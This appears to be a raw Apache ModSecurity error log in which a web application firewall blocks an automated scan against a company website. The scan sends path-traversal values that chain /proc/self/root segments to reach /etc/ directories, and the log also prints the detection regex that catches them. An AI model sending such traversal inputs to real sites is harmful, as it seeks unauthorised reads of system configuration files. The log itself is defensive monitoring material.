[Mon Mar 16 10:10:44.603726 2026] [:error] [pid 21805:tid 140411616036608] [client 74.7.243.203:40494] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgBVLABkC4fWIHEf8HcJAAAAE8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:10:45.769149 2026] [:error] [pid 21805:tid 140411666392832] [client 74.7.243.203:40500] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgBVbABkC4fWIHEf8HcJgAAAEk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:10:47.041029 2026] [:error] [pid 10772:tid 140411582465792] [client 74.7.243.203:40508] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgBV_9ocpUE4ed4uDzemgAAAhM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:10:49.303661 2026] [:error] [pid 11972:tid 140411683178240] [client 74.7.243.203:40518] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgBWZqj1wV0Si-OkefabQAAAAc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:10:50.570982 2026] [:error] [pid 10772:tid 140411699963648] [client 74.7.243.203:44092] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgBWv9ocpUE4ed4uDzemwAAAgU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:10:51.873530 2026] [:error] [pid 21533:tid 140411599251200] [client 74.7.243.203:44094] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgBW3jZBu2q05ozVU9G8gAAAVE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:10:53.158980 2026] [:error] [pid 21533:tid 140411582465792] [client 74.7.243.203:44110] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgBXXjZBu2q05ozVU9G8wAAAVM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:10:55.578289 2026] [:error] [pid 11972:tid 140411649607424] [client 74.7.243.203:44114] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgBX5qj1wV0Si-OkefabwAAAAs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:11:01.877369 2026] [:error] [pid 11972:tid 140411725141760] [client 74.7.243.203:55458] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgBZZqj1wV0Si-OkefacAAAAAI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:11:03.008275 2026] [:error] [pid 11972:tid 140411590858496] [client 74.7.243.203:55462] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgBZ5qj1wV0Si-OkefacQAAABI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:11:04.276975 2026] [:error] [pid 10772:tid 140411683178240] [client 74.7.243.203:55478] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgBaP9ocpUE4ed4uDzenAAAAgc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:11:06.623328 2026] [:error] [pid 11972:tid 140411699963648] [client 74.7.243.203:55490] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgBapqj1wV0Si-OkefadAAAAAU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:11:07.907093 2026] [:error] [pid 10709:tid 140411565680384] [client 74.7.243.203:55492] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgBaxXjF1vJNtV6CWrqdAAAAdU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:11:12.347850 2026] [:error] [pid 21533:tid 140411540502272] [client 74.7.243.203:55502] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgBcHjZBu2q05ozVU9G-gAAAVg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:11:14.641402 2026] [:error] [pid 11972:tid 140411733534464] [client 74.7.243.203:36754] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgBcpqj1wV0Si-OkefaewAAAAE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:11:15.911504 2026] [:error] [pid 10831:tid 140411616036608] [client 74.7.243.203:36766] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgBc46lpbStxTqkSktfzQAAAk8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:11:18.321086 2026] [:error] [pid 10831:tid 140411733534464] [client 74.7.243.203:36772] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgBdo6lpbStxTqkSktfzwAAAkE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:11:19.612292 2026] [:error] [pid 10651:tid 140411582465792] [client 74.7.243.203:36774] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgBd7ysWC90G-1nBrA2AwAAAZM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:11:23.012819 2026] [:error] [pid 11972:tid 140411725141760] [client 74.7.243.203:54404] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgBe5qj1wV0Si-OkefafgAAAAI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:11:25.303151 2026] [:error] [pid 10709:tid 140411641214720] [client 74.7.243.203:54420] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgBfRXjF1vJNtV6CWrqdwAAAcw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:11:26.617468 2026] [:error] [pid 21806:tid 140411666392832] [client 74.7.243.203:54422] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgBftSswJuvopo3lOhRiwAAAIk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
